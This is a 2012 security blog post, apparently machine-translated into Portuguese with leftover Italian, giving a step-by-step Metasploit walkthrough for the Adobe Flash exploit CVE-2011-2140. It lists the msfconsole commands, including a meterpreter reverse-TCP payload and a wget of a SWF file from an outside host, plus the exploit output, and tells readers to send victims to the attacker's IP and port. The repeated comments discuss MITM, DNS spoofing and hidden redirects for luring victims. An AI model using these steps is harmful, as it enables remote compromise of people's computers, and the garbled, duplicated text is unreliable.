ClsHack:Computer Security Blog    

[CVE-2011-2140 && Metasploit]

Postado em: 10 Fevereiro 2012

Módulo de novo adicionado à metasploit :D que explora bugs em um maior Flash Player.

Vulnerabilidade indicado pela CVE-2011-2140, Aqui estão os detalhes:

Adobe Flash Player antes 10.3.183.5 no Windows, Mac OS X, Linux, e Solaris e antes 10.3.186.3 on Android, e Adobe AIR antes 2.7.1 no Windows e Mac OS X e antes 2.7.1.1961 on Androno Androide que invasores executem código arbitrário ou causar uma negação de serviço (corrupção de memória) através de vetores não especificados, uma vulnerabilidade diferente do CVE-2011-2135, CVE-2011-2417, e CVE-2011-2425.

Adobe Flash Player MP4 estouro de buffer SequenceParameterSetNALUnit

Vamos ver como usar o Metasploit :D

A primeira coisa a fazer é atualizar Metasploit:
sudo msfupdate

Agora vamos começar Metasploit:
sudo msfconsole

Usiamo l'exploit:
use exploit/windows/browser/adobe_flash_sps

Os comandos são sempre aqueles :D
Vamos definir o payload:
set PAYLOAD windows/meterpreter/reverse_tcp
Configure o payload:
set LHOST MY_IP
Configuriamo l'exploit:
set URIPATH /

Agora vamos definir a SWF jogador, Eu tirei do poc abysssec:
wget http://www.clshack.it/nopaste/mediaplayer.swf
set SWF_PLAYER_URI mediaplayer.swf

Começamos o exploit:
msf exploit(adobe_flash_sps) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.190:4444
[*] Using URL: http://0.0.0.0:8080/J1YpA0
[*] Local IP: http://192.168.1.190:8080/J1YpA0
[*] Server started.
msf exploit(adobe_flash_sps) >

Divertir-se :D

Enviamos a nossa vítima em nosso ip:PORT , ÁRVORE e :D

Related posts:

  1. [CVE-2010-1297]Metasploit:Flash Player 9x, 10.0 Excution remota de código
  2. IE 6/7 EXPLORAR execução de código XML remoto com Metasploit
  3. [CVE:2011-4862] Remoto Root FreeBSD
  4. [CVE-2011-3544]Metasploit: Java não confiáveis ​​remoto Java Web Start
  5. [CVE-2010-2568]Metasploit:janelas Exuction Código Oday remoto

Esta entrada foi postada na sexta-feira, 10 de fevereiro, 2012 em 9:39 am e está arquivada em GNU / Linux, Hacking, Software. Você pode acompanhar quaisquer respostas a esta entrada através do RSS 2.0 alimentar. Você pode deixar uma resposta, ou trackback a partir do seu próprio site.

Tagged com:
  • Salz

    Olá Mas esta façanha trabalhar remotamente?

    • Ac1d

      Desculpe-me, como parte de execução remota de código que você não entende?

  • Salz

    Olá Mas esta façanha trabalhar remotamente?

    • Ac1d

      Desculpe-me, como parte de execução remota de código que você não entende?

  • Anônimo

    Mas é um exploits do lado do cliente deve passar o link para a vítima ;) 
    Por exemplo, com um ataque http://www.clshack.com/?s=mitm

    • Formatos de Simone

      então é claro que eu tenho que entrar navegador da vítima no meu ip com a porta ?
      atacar alguns’ sem sentido :-D

      • Anônimo

        Se você está na rede local, ou você pode fazer um ataque MITM pode explorar algumas das xss diferentes sites, e assim por diante… é tolice :D

        • http://www.facebook.com/people/Giovanni-Colucci/1336991660 John Colucci

          Se você também deve executar um local dns spoof…ou errado?

          • Anônimo

            Você pode fazer uma paródia simples ;) 

        • Formatos de Simone

          bem eu vou é claro, mas você sempre tem que dizer a vítima a entrar no link para esse endereço com a porta! para fazê-lo funcionar…
          :-D

  • ClsHackBlog

    Mas é um exploits do lado do cliente deve passar o link para a vítima ;) 
    Por exemplo, com um ataque http://www.clshack.com/?s=mitm

    • Formatos de Simone

      então é claro que eu tenho que entrar navegador da vítima no meu ip com a porta ?
      atacar alguns’ sem sentido :-D

      • ClsHackBlog

        Se você está na rede local, ou você pode fazer um ataque MITM pode explorar algumas das xss diferentes sites, e assim por diante… é tolice :D

        • http://www.facebook.com/people/Giovanni-Colucci/1336991660 John Colucci

          Se você também deve executar um local dns spoof…ou errado?

          • ClsHackBlog

            Você pode fazer uma paródia simples ;) 

        • Formatos de Simone

          bem eu vou é claro, mas você sempre tem que dizer a vítima a entrar no link para esse endereço com a porta! para fazê-lo funcionar…
          :-D

  • Zigfried Zorba

    Este exploit não funciona com Windows XP SP3..

    • Anônimo

      Tente atualizar :)

  • Zigfried Zorba

    Este exploit não funciona com Windows XP SP3..

    • ClsHackBlog

      Tente atualizar :)

  • Zacky

    Mas agora os roteadores modernos parar os ataques MITM e bloquear a conexão com a vítima (Eu acontecer com a estação vodafone por exemplo) você pode fazer para contornar essa coisa?

    • Anônimo

      Se você não é local, se você é remotamente você deve encontrar outra maneira de fazer a vítima rendirect nattato seu ip para o exterior :) 

      • Zacky

        sisi significa que localmente .. usando ettercap às vezes por causa da proteção interna de alguns roteadores (pelo menos eu acho) o ataque não é bem sucedido e tráfego da vítima é bloqueado e não é capaz de navegar!! O que você pode fazer nestes casos?

        • Anônimo

          compreender o problema, por vezes, é um problema no ettercap :D

          Eu uso para fazer MITM scapy e você encontrará algo aqui no blog ;)Caso contrário, envie o link para a vítima :D

          • Zacky

            Então eu acho que é hora de tentar installaro hehe ;)

          • Zacky

            tentei, mas nada é meu vodafone estação sgama o mac e eu dupliquei o tráfego de blocos :S

  • Zacky

    Mas agora os roteadores modernos parar os ataques MITM e bloquear a conexão com a vítima (Eu acontecer com a estação vodafone por exemplo) você pode fazer para contornar essa coisa?

    • ClsHackBlog

      Se você não é local, se você é remotamente você deve encontrar outra maneira de fazer a vítima rendirect nattato seu ip para o exterior :) 

      • Zacky

        sisi significa que localmente .. usando ettercap às vezes por causa da proteção interna de alguns roteadores (pelo menos eu acho) o ataque não é bem sucedido e tráfego da vítima é bloqueado e não é capaz de navegar!! O que você pode fazer nestes casos?

        • ClsHackBlog

          compreender o problema, por vezes, é um problema no ettercap :D

          Eu uso para fazer MITM scapy e você encontrará algo aqui no blog ;)Caso contrário, envie o link para a vítima :D

          • Zacky

            Então eu acho que é hora de tentar installaro hehe ;)

          • Zacky

            tentei, mas nada é meu vodafone estação sgama o mac e eu dupliquei o tráfego de blocos :S

  • Unknownita

    Eu tenho uma pergunta, mas se eu fizer uma dsnspoof como mudar os dns no roteador redirecionando PC da vítima infectada no endereço. Então, depois de nenhum pior? porque o usuário vai digitar o cada vez http://www.google.it final do local infectado? existe uma mais transparente?que certamente vai entender que algo está errado..

    • Unknownita

      Talvez uma solução poderia ser a direccioná-la para a minha página em branco que então redireciona o tot segundo depois que o site real?

  • Unknownita

    Eu tenho uma pergunta, mas se eu fizer uma dsnspoof como mudar os dns no roteador redirecionando PC da vítima infectada no endereço. Então, depois de nenhum pior? porque o usuário vai digitar o cada vez http://www.google.it final do local infectado? existe uma mais transparente?que certamente vai entender que algo está errado..

    • Unknownita

      Talvez uma solução poderia ser a direccioná-la para a minha página em branco que então redireciona o tot segundo depois que o site real?